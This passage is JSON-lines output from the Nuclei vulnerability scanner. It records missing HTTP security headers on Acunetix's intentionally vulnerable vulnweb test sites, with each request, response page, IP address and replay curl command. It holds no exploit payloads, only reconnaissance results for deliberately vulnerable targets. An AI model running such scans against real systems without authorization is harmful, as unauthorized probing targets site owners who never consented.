href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:55.930728083Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:55.93079452Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.237591755Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.402031449Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can 